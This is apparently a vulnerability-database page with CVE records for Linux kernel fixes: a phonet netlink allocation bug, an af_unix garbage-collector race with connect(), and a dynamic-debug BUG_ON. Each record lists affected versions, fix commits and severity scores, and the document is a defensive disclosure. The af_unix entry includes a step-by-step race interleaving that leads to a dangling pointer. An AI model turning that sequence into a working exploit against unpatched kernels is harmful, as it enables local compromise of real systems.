"dateUpdated": "2024-09-11T17:34:59.537Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/phonet/pn_netlink.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ec1f71c05caeba0f814df77e0f511d8b4618623a",
"status": "affected",
"version": "f062f41d06575744b9eaf725eef8a5d3b5f5b7ca",
"versionType": "git"
},
{
"lessThan": "dc6beac059f0331de97155a89d84058d4a9e49c7",
"status": "affected",
"version": "f062f41d06575744b9eaf725eef8a5d3b5f5b7ca",
"versionType": "git"
},
{
"lessThan": "f085e02f0a32f6dfcfabc6535c9c4a1707cef86b",
"status": "affected",
"version": "f062f41d06575744b9eaf725eef8a5d3b5f5b7ca",
"versionType": "git"
},
{
"lessThan": "4ff334cade9dae50e4be387f71e94fae634aa9b4",
"status": "affected",
"version": "f062f41d06575744b9eaf725eef8a5d3b5f5b7ca",
"versionType": "git"
},
{
"lessThan": "728a83160f98ee6b60df0d890141b9b7240182fe",
"status": "affected",
"version": "f062f41d06575744b9eaf725eef8a5d3b5f5b7ca",
"versionType": "git"
},
{
"lessThan": "ee9e39a6cb3ca2a3d35b4ae25547ee3526a44d00",
"status": "affected",
"version": "f062f41d06575744b9eaf725eef8a5d3b5f5b7ca",
"versionType": "git"
},
{
"lessThan": "9a77226440008cf04ba68faf641a2d50f4998137",
"status": "affected",
"version": "f062f41d06575744b9eaf725eef8a5d3b5f5b7ca",
"versionType": "git"
},
{
"lessThan": "d8cac8568618dcb8a51af3db1103e8d4cc4aeea7",
"status": "affected",
"version": "f062f41d06575744b9eaf725eef8a5d3b5f5b7ca",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/phonet/pn_netlink.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.33"
},
{
"lessThan": "2.6.33",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.314",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.276",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.314",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.276",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.33",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nphonet: fix rtm_phonet_notify() skb allocation\n\nfill_route() stores three components in the skb:\n\n- struct rtmsg\n- RTA_DST (u8)\n- RTA_OIF (u32)\n\nTherefore, rtm_phonet_notify() should use\n\nNLMSG_ALIGN(sizeof(struct rtmsg)) +\nnla_total_size(1) +\nnla_total_size(4)"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:12:36.121Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ec1f71c05caeba0f814df77e0f511d8b4618623a"
},
{
"url": "https://git.kernel.org/stable/c/dc6beac059f0331de97155a89d84058d4a9e49c7"
},
{
"url": "https://git.kernel.org/stable/c/f085e02f0a32f6dfcfabc6535c9c4a1707cef86b"
},
{
"url": "https://git.kernel.org/stable/c/4ff334cade9dae50e4be387f71e94fae634aa9b4"
},
{
"url": "https://git.kernel.org/stable/c/728a83160f98ee6b60df0d890141b9b7240182fe"
},
{
"url": "https://git.kernel.org/stable/c/ee9e39a6cb3ca2a3d35b4ae25547ee3526a44d00"
},
{
"url": "https://git.kernel.org/stable/c/9a77226440008cf04ba68faf641a2d50f4998137"
},
{
"url": "https://git.kernel.org/stable/c/d8cac8568618dcb8a51af3db1103e8d4cc4aeea7"
}
],
"title": "phonet: fix rtm_phonet_notify() skb allocation",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36946",
"datePublished": "2024-05-30T15:35:43.884Z",
"dateReserved": "2024-05-30T15:25:07.079Z",
"dateUpdated": "2025-05-04T09:12:36.121Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26923 (GCVE-0-2024-26923)
Vulnerability from cvelistv5
Published
2024-04-24 21:49
Modified
2025-05-04 08:59
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
af_unix: Fix garbage collector racing against connect()
Garbage collector does not take into account the risk of embryo getting
enqueued during the garbage collection. If such embryo has a peer that
carries SCM_RIGHTS, two consecutive passes of scan_children() may see a
different set of children. Leading to an incorrectly elevated inflight
count, and then a dangling pointer within the gc_inflight_list.
sockets are AF_UNIX/SOCK_STREAM
S is an unconnected socket
L is a listening in-flight socket bound to addr, not in fdtable
V's fd will be passed via sendmsg(), gets inflight count bumped
connect(S, addr) sendmsg(S, [V]); close(V) __unix_gc()
---------------- ------------------------- -----------
NS = unix_create1()
skb1 = sock_wmalloc(NS)
L = unix_find_other(addr)
unix_state_lock(L)
unix_peer(S) = NS
// V count=1 inflight=0
NS = unix_peer(S)
skb2 = sock_alloc()
skb_queue_tail(NS, skb2[V])
// V became in-flight
// V count=2 inflight=1
close(V)
// V count=1 inflight=1
// GC candidate condition met
for u in gc_inflight_list:
if (total_refs == inflight_refs)
add u to gc_candidates
// gc_candidates={L, V}
for u in gc_candidates:
scan_children(u, dec_inflight)
// embryo (skb1) was not
// reachable from L yet, so V's
// inflight remains unchanged
__skb_queue_tail(L, skb1)
unix_state_unlock(L)
for u in gc_candidates:
if (u.inflight)
scan_children(u, inc_inflight_move_tail)
// V count=1 inflight=2 (!)
If there is a GC-candidate listening socket, lock/unlock its state. This
makes GC wait until the end of any ongoing connect() to that socket. After
flipping the lock, a possibly SCM-laden embryo is already enqueued. And if
there is another embryo coming, it can not possibly carry SCM_RIGHTS. At
this point, unix_inflight() can not happen because unix_gc_lock is already
taken. Inflight graph remains unaffected.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1fd05ba5a2f2aa8e7b9b52ef55df850e2e7d54c9 Version: 1fd05ba5a2f2aa8e7b9b52ef55df850e2e7d54c9 Version: 1fd05ba5a2f2aa8e7b9b52ef55df850e2e7d54c9 Version: 1fd05ba5a2f2aa8e7b9b52ef55df850e2e7d54c9 Version: 1fd05ba5a2f2aa8e7b9b52ef55df850e2e7d54c9 Version: 1fd05ba5a2f2aa8e7b9b52ef55df850e2e7d54c9 Version: 1fd05ba5a2f2aa8e7b9b52ef55df850e2e7d54c9 Version: 1fd05ba5a2f2aa8e7b9b52ef55df850e2e7d54c9 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26923",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-02T00:00:00+00:00",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-10T19:34:43.753Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.612Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a36ae0ec2353015f0f6762e59f4c2dbc0c906423"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/343c5372d5e17b306db5f8f3c895539b06e3177f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2e2a03787f4f0abc0072350654ab0ef3324d9db3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e76c2678228f6aec74b305ae30c9374cc2f28a51"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b75722be422c276b699200de90527d01c602ea7c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/507cc232ffe53a352847893f8177d276c3b532a9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dbdf7bec5c920200077d693193f989cb1513f009"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/47d8ac011fe1c9251070e1bd64cb10b48193ec51"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/unix/garbage.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a36ae0ec2353015f0f6762e59f4c2dbc0c906423",
"status": "affected",
"version": "1fd05ba5a2f2aa8e7b9b52ef55df850e2e7d54c9",
"versionType": "git"
},
{
"lessThan": "343c5372d5e17b306db5f8f3c895539b06e3177f",
"status": "affected",
"version": "1fd05ba5a2f2aa8e7b9b52ef55df850e2e7d54c9",
"versionType": "git"
},
{
"lessThan": "2e2a03787f4f0abc0072350654ab0ef3324d9db3",
"status": "affected",
"version": "1fd05ba5a2f2aa8e7b9b52ef55df850e2e7d54c9",
"versionType": "git"
},
{
"lessThan": "e76c2678228f6aec74b305ae30c9374cc2f28a51",
"status": "affected",
"version": "1fd05ba5a2f2aa8e7b9b52ef55df850e2e7d54c9",
"versionType": "git"
},
{
"lessThan": "b75722be422c276b699200de90527d01c602ea7c",
"status": "affected",
"version": "1fd05ba5a2f2aa8e7b9b52ef55df850e2e7d54c9",
"versionType": "git"
},
{
"lessThan": "507cc232ffe53a352847893f8177d276c3b532a9",
"status": "affected",
"version": "1fd05ba5a2f2aa8e7b9b52ef55df850e2e7d54c9",
"versionType": "git"
},
{
"lessThan": "dbdf7bec5c920200077d693193f989cb1513f009",
"status": "affected",
"version": "1fd05ba5a2f2aa8e7b9b52ef55df850e2e7d54c9",
"versionType": "git"
},
{
"lessThan": "47d8ac011fe1c9251070e1bd64cb10b48193ec51",
"status": "affected",
"version": "1fd05ba5a2f2aa8e7b9b52ef55df850e2e7d54c9",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/unix/garbage.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.23"
},
{
"lessThan": "2.6.23",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.314",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.156",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.87",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.28",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.314",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.156",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.87",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.28",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.7",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.23",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\naf_unix: Fix garbage collector racing against connect()\n\nGarbage collector does not take into account the risk of embryo getting\nenqueued during the garbage collection. If such embryo has a peer that\ncarries SCM_RIGHTS, two consecutive passes of scan_children() may see a\ndifferent set of children. Leading to an incorrectly elevated inflight\ncount, and then a dangling pointer within the gc_inflight_list.\n\nsockets are AF_UNIX/SOCK_STREAM\nS is an unconnected socket\nL is a listening in-flight socket bound to addr, not in fdtable\nV\u0027s fd will be passed via sendmsg(), gets inflight count bumped\n\nconnect(S, addr)\tsendmsg(S, [V]); close(V)\t__unix_gc()\n----------------\t-------------------------\t-----------\n\nNS = unix_create1()\nskb1 = sock_wmalloc(NS)\nL = unix_find_other(addr)\nunix_state_lock(L)\nunix_peer(S) = NS\n\t\t\t// V count=1 inflight=0\n\n \t\t\tNS = unix_peer(S)\n \t\t\tskb2 = sock_alloc()\n\t\t\tskb_queue_tail(NS, skb2[V])\n\n\t\t\t// V became in-flight\n\t\t\t// V count=2 inflight=1\n\n\t\t\tclose(V)\n\n\t\t\t// V count=1 inflight=1\n\t\t\t// GC candidate condition met\n\n\t\t\t\t\t\tfor u in gc_inflight_list:\n\t\t\t\t\t\t if (total_refs == inflight_refs)\n\t\t\t\t\t\t add u to gc_candidates\n\n\t\t\t\t\t\t// gc_candidates={L, V}\n\n\t\t\t\t\t\tfor u in gc_candidates:\n\t\t\t\t\t\t scan_children(u, dec_inflight)\n\n\t\t\t\t\t\t// embryo (skb1) was not\n\t\t\t\t\t\t// reachable from L yet, so V\u0027s\n\t\t\t\t\t\t// inflight remains unchanged\n__skb_queue_tail(L, skb1)\nunix_state_unlock(L)\n\t\t\t\t\t\tfor u in gc_candidates:\n\t\t\t\t\t\t if (u.inflight)\n\t\t\t\t\t\t scan_children(u, inc_inflight_move_tail)\n\n\t\t\t\t\t\t// V count=1 inflight=2 (!)\n\nIf there is a GC-candidate listening socket, lock/unlock its state. This\nmakes GC wait until the end of any ongoing connect() to that socket. After\nflipping the lock, a possibly SCM-laden embryo is already enqueued. And if\nthere is another embryo coming, it can not possibly carry SCM_RIGHTS. At\nthis point, unix_inflight() can not happen because unix_gc_lock is already\ntaken. Inflight graph remains unaffected."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:59:47.874Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a36ae0ec2353015f0f6762e59f4c2dbc0c906423"
},
{
"url": "https://git.kernel.org/stable/c/343c5372d5e17b306db5f8f3c895539b06e3177f"
},
{
"url": "https://git.kernel.org/stable/c/2e2a03787f4f0abc0072350654ab0ef3324d9db3"
},
{
"url": "https://git.kernel.org/stable/c/e76c2678228f6aec74b305ae30c9374cc2f28a51"
},
{
"url": "https://git.kernel.org/stable/c/b75722be422c276b699200de90527d01c602ea7c"
},
{
"url": "https://git.kernel.org/stable/c/507cc232ffe53a352847893f8177d276c3b532a9"
},
{
"url": "https://git.kernel.org/stable/c/dbdf7bec5c920200077d693193f989cb1513f009"
},
{
"url": "https://git.kernel.org/stable/c/47d8ac011fe1c9251070e1bd64cb10b48193ec51"
}
],
"title": "af_unix: Fix garbage collector racing against connect()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26923",
"datePublished": "2024-04-24T21:49:22.001Z",
"dateReserved": "2024-02-19T14:20:24.194Z",
"dateUpdated": "2025-05-04T08:59:47.874Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35947 (GCVE-0-2024-35947)
Vulnerability from cvelistv5
Published
2024-05-19 11:14
Modified
2025-05-04 09:09
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
dyndbg: fix old BUG_ON in >control parser
Fix a BUG_ON from 2009. Even if it looks "unreachable" (I didn't
really look), lets make sure by removing it, doing pr_err and return
-EINVAL instead.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-35947",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-01-16T21:11:33.420262Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-01-16T21:12:02.447Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.979Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3c718bddddca9cbef177ac475b94c5c91147fb38"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/343081c21e56bd6690d342e2f5ae8c00183bf081"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/41d8ac238ab1cab01a8c71798d61903304f4e79b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ba3c118cff7bcb0fe6aa84ae1f9080d50e31c561"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a66c869b17c4c4dcf81d273b02cb0efe88e127ab"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a69e1bdd777ce51061111dc419801e8a2fd241cc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/529e1852785599160415e964ca322ee7add7aef0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/00e7d3bea2ce7dac7bee1cf501fb071fd0ea8f6c"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OTB4HWU2PTVW5NEYHHLOCXDKG3PYA534/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"lib/dynamic_debug.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3c718bddddca9cbef177ac475b94c5c91147fb38",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "343081c21e56bd6690d342e2f5ae8c00183bf081",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "41d8ac238ab1cab01a8c71798d61903304f4e79b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ba3c118cff7bcb0fe6aa84ae1f9080d50e31c561",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a66c869b17c4c4dcf81d273b02cb0efe88e127ab",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a69e1bdd777ce51061111dc419801e8a2fd241cc",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "529e1852785599160415e964ca322ee7add7aef0",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "00e7d3bea2ce7dac7bee1cf501fb071fd0ea8f6c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"lib/dynamic_debug.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.314",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.276",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.314",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.276",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndyndbg: fix old BUG_ON in \u003econtrol parser\n\nFix a BUG_ON from 2009. Even if it looks \"unreachable\" (I didn\u0027t\nreally look), lets make sure by removing it, doing pr_err and return\n-EINVAL instead."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:09:00.219Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3c718bddddca9cbef177ac475b94c5c91147fb38"
},
{
"url": "https://git.kernel.org/stable/c/343081c21e56bd6690d342e2f5ae8c00183bf081"
},
{
"url": "https://git.kernel.org/stable/c/41d8ac238ab1cab01a8c71798d61903304f4e79b"
},
{
"url": "https://git.kernel.org/stable/c/ba3c118cff7bcb0fe6aa84ae1f9080d50e31c561"
},
{
"url": "https://git.kernel.org/stable/c/a66c869b17c4c4dcf81d273b02cb0efe88e127ab"
},
{
"url": "https://git.kernel.org/stable/c/a69e1bdd777ce51061111dc419801e8a2fd241cc"
},
{
"url": "https://git.kernel.org/stable/c/529e1852785599160415e964ca322ee7add7aef0"
},
{
"url": "https://git.kernel.org/stable/c/00e7d3bea2ce7dac7bee1cf501fb071fd0ea8f6c"
}
],
"title": "dyndbg: fix old BUG_ON in \u003econtrol parser",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35947",
"datePublished": "2024-05-19T11:14:49.924Z",
"dateReserved": "2024-05-17T13:50:33.133Z",
"dateUpdated": "2025-05-04T09:09:00.219Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35845 (GCVE-0-2024-35845)
Vulnerability from cvelistv5
Published
2024-05-17 14:40
Modified
2025-05-04 09:06
Severity ?
VLAI Severity ?
